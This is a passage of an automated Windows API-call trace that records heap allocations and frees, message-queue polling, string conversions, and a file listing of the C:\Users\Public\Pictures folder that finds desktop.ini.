Size=0x10) returned 0x2aab560 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0224.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0224.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0224.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0224.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0224.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0224.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0224.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0224.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0224.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0224.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0224.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0224.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0224.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0224.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0224.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0224.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0224.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0224.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0224.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0224.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0224.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0224.178] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0224.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0224.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0224.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0224.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0224.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0224.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0224.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0224.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0224.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0224.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0224.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9) returned 0x2aab908 [0224.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2aab908, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0224.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5f720 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7a0 [0224.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Pictures", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x19) returned 0x2a77b70 [0224.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Pictures", cchWideChar=25, lpMultiByteStr=0x2a77b70, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Public\\Pictures", lpUsedDefaultChar=0x0) returned 25 [0224.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0224.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x32) returned 0x2a5eb00 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0224.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0224.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0224.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0224.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0224.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0224.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0224.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0224.181] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77b70, cbMultiByte=25, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0224.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x32) returned 0x2a5e840 [0224.181] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77b70, cbMultiByte=25, lpWideCharStr=0x2a5e840, cchWideChar=25 | out: lpWideCharStr="C:\\Users\\Public\\Pictures") returned 25 [0224.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0224.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0224.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0224.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0224.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0224.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0224.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0224.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0224.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0224.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0224.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f720 | out: hHeap=0x2af0000) returned 1 [0224.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0224.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0224.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0224.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0224.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0224.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0224.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0224.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0224.182] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0224.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0224.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0224.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0224.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0224.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0224.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0224.183] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\" (normalized: "c:\\users\\public\\pictures")) returned 0x11 [0224.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0224.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0224.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0224.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0224.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0224.183] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0224.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0224.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0224.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0224.183] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0224.183] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0224.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0224.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17) returned 0x29f71e0 [0224.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x29f71e0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0224.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0224.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x59) returned 0x2a74bf0 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8a8 [0224.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0224.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0224.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2a71a68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0224.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0224.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0224.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0224.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74bf0 | out: hHeap=0x2af0000) returned 1 [0224.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0224.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0224.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0224.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0224.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0224.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0224.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0224.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0224.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0224.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0224.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0224.185] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0224.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0224.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0224.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0224.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0224.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0224.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0224.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0224.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0224.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0224.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0224.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0224.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0224.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0224.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0224.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0224.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0224.186] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0224.186] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0224.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0224.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0224.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0224.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0224.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0224.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0224.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0224.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0224.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0224.186] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0224.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0224.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0224.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0224.187] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0224.187] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0x9e1bf8 [0224.187] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0224.187] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0224.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0224.187] 